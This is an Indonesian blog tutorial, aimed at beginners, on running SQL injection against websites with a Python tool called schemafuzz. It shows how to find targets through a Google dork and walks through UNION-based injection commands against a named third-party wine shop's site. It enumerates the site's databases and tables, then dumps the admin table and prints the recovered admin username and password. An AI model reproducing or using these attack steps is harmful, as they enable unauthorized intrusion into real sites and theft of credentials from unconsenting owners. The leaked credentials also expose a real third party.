//
you're reading...
software, teknik komputer dan jaringan

Sql Injection dengan Program Python

Khusus buat Para Newbie Yang pengen belajar,,, jadi buat para master yang udah jago di liat2 aja dech….
Mungkin masih banyak kekurangan dalam tutorial ini, untuk itu ayo kita sama sama belajar…

TKP :
Schema Fuzzy adalah tools yang di buat dengan bahasa python yang dipergunakan untuk melakukan test SQL Injection pada sebuah website…
feature dan hal2 yang di butuhkan yaitu :
1. Komputer (fast speed)
2. Koneksi internet (fast connection)
3. Program Python-2.6.4 (bisa di download disini !! Setelah Di download Langsung Di install di PC/Laptop anda)
4. script schemafuzzy.py (adalah script yang akan di gunakan untuk mencari database,column and table ,, Untuk download scriptsx Klik disini !!)
5. CMD
6. target website (misal menggunakan kata kunci di google : “products.php?cat=”)
Sudah Di siapkan?
di pastikan Kamu sudah install python2.6.4. Copy schemafuzz.py ke dalam dir python26. Kalo sudah selesai langsung jalankan. Caranya :
klik start>>Run>>CMD
truss and aktif ke directory c:\ dengan mengetik CD ../..

perintah dasar schemafuzzy ini yaitu :
schemafuzzy.py -u “target” –perintah
1. kita gunakan di target kita. (disini saya ambil target yang saya dapatkan di google dengan kata kunci : “products.php?cat=”) yaitu :
http://www.queenannewine.com/products.php?cat=1
2. Cek kolomnya
python schemafuzzy.py -u http://www.queenannewine.com/products.php?cat=1 –findcol
Hingga muncul :

3. setelah ini kamu masuk ke direktory c:\ di mana python terinstall cari name file schemafuzzlog.txt <– di sini ada hasil column yang berhasil di cari tadi….

4. Cari Db nya..
python schemafuzz.py -u “http://www.queenannewine.com/products.php?cat=1+AND+1=2+UNION+SELECT+0,dimensi, 2,3″ -dbs
Hingga Muncul :

Kita sudah temukan data base site tersebut :
database ada 3 :
1. C239128_QAWcal
2. C239128_queen
3. C239128_queen2
tapi pada penjesalan ini kita akan gunakan database nomor2
5. Cari nama table dalam database C239128_queen
python schemafuzz.py -u “http://www.queenannewine.com/products.php?cat=1+AND+1=2+UNION+SELECT+0,dimensi, 2,3″ –schema -D C239128_queen
Hingga Muncul Hasil :

keluar semua colomnya… dari sini kita mengetahui bahwa web tersebut memiliki 56 Columns. (pic di atas pencarian Blom selesai, jadi kalian kalian harus selesaikan sampai column 56) Sekarang kita tinggal pilih kolom yang akan kita exploit ….
6. Exploit Tables and Columns :
python schemafuzz.py -u “http://www.queenannewine.com/products.php?cat=1+AND+1=2+UNION+SELECT+0,dimensi, 2,3″ –dump -D C239128_queen -T – di isi Nama table -C di isi nama columns..
Misal gua mau Melihat data data yang ada di columns admin :
Dengan perintah :
python schemafuzz.py -u “http://www.queenannewine.com/products.php?cat=1+AND+1=2+UNION+SELECT+0,dimensi, 2,3″ –dump -D C239128_queen -T admin -C adminUser,adminPassword
Hingga Muncul Hasil seperti di bawah ini :
Lihat
jbalji:mcse6273:mcse6273:
ini adalah user dan password admin yang keluar.. . Cara ini hanya berlaku untuk sql versi 5. untuk versi 4, Harus Manual.
Nah user and password admin dah ketahuan… untuk login ke adminx.. silahkan anda cari sendiri link loginx….
oke sekian dari saya
segala penyalah gunaan dari artikel ini bukan Tanggung jawab penulis.
Semoga bermanfaat bagi anda.

Advertisements

Discussion

No comments yet.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

Masukkan alamat surat elektronik Anda untuk mengikuti blog ini dan menerima pemberitahuan tentang tulisan baru melalui surat elektronik.

Join 391 other followers

January 2014
M T W T F S S
« Dec   Feb »
 12345
6789101112
13141516171819
20212223242526
2728293031  
Flag Counter
Powered by Wordpress ~ Designed by WooThemes ~ Redesigned by Aditia Nugraha

Artikel Terlaris Pilihan Pembaca

Cara Reset MikroTik Dengan Netinstall , Sebuah alternatif untuk reset setting mikrotik agan di Mikrotik RB750 atau RB751. Cara reset mikroTik dengan netinstall ini mungkin dah paling extreme kali yak Baca selengkapnya »

%d bloggers like this: